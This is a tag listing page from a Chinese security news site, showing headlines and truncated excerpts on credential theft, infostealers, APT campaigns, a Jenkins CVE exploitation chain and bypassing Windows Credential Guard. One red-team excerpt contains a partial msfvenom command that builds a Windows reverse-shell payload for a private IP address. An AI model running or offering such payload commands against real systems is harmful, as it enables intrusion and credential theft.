credential - 第 3 | CN-SEC 中文网

安全新闻

Okta警告称代理驱动的凭证填充攻击激增

Identity and access management (IAM) services provider Okta has warned of a spike in the "frequency ...

05月07日13 views评论

阅读全文

安全文章

红队战术 - WMI + MSI 横向移动

执行在 MSI（Microsoft 安装程序包）中生成恶意负载：攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...

04月19日13 views评论

阅读全文

ATT&CK - 凭据访问

Credential Access Credential access represents techniques that can be used by adversaries to obtain ...

04月15日ATTACK18 views评论

阅读全文

ATT&CK -

Web浏览器凭证攻击者可以通过读取特定于目标浏览器的文件来从Web浏览器获取凭据。 Web浏览器通常会保存凭据，例如网站用户名和密码，以便将来无需手动输入它们。Web浏览器通常将凭据以加密格式存储在...

04月15日ATTACK10 views评论

阅读全文

安全新闻

基于Python的Snake信息窃取器攻击Facebook用户

Facebook messages are being used by threat actors to a Python-based information stealer dubbed Snake...

03月10日30 views评论

阅读全文

安全漏洞

Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙

一、前言本文将深入研究一项涉及Jenkins的安全漏洞（CVE-2024–23897），将在实验室中介绍这些概念，这些技能对于渗透测试期间有效管理输出至关重要，而在本次漏洞利用中，更显得尤为关键。本文...

03月05日176 views评论

阅读全文

安全新闻

网络安全机构发布警告：APT28的MooBot威胁

In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries a...

02月29日74 views评论

阅读全文

安全新闻

黑客利用开源SSH-Snake工具进行网络攻击

A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors t...

02月23日27 views评论

阅读全文

移动安全

复现一个有争议的安卓漏洞，是严重还是中危？是权限提升还是信息泄露？

本文继续为大家带来安卓漏洞的分析和复现。这次分析和复现的是 CVE-2023-40076。为什么有争议呢？请大家跟随分析过程往下看。漏洞信息描述CVE-2023-40076风险级别：X漏洞类型：信息泄...

02月19日210 views评论

阅读全文

安全新闻

Cloudflare泄露：国家级黑客入侵并获取源代码和内部文档

Cloudflare has revealed that it was the target of a likely nation-state attack in which the threat a...

02月03日65 views评论

阅读全文

内网信息收集备忘录（下）

Part1 前言大家好，我是影流团队的WuWuWu。接内网信息收集上篇，本期分享内网信息收集下篇。 Part2 远程桌面RDP查看在本地机器连接过的其他机器命令（1）regquery "HKEY_...

01月11日安全文章13 views评论

阅读全文

安全文章

绕过Credential Guard 读取明文凭据

Tips +1 前言 Windows 10 之前，Lsass 将操作系统所使用的密码存储在其进程内存中当我们获取到机器权限后，经常使用Mimikatz在机器上获取各种凭证，包括明文密码，NTLM哈希...

12月21日59 views评论

阅读全文

Okta警告称代理驱动的凭证填充攻击激增

红队战术 - WMI + MSI 横向移动

ATT&CK - 凭据访问

ATT&CK -

基于Python的Snake信息窃取器攻击Facebook用户

Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙

网络安全机构发布警告：APT28的MooBot威胁

黑客利用开源SSH-Snake工具进行网络攻击

复现一个有争议的安卓漏洞，是严重还是中危？是权限提升还是信息泄露？

Cloudflare泄露：国家级黑客入侵并获取源代码和内部文档

内网信息收集备忘录（下）

绕过Credential Guard 读取明文凭据

在线咨询

微信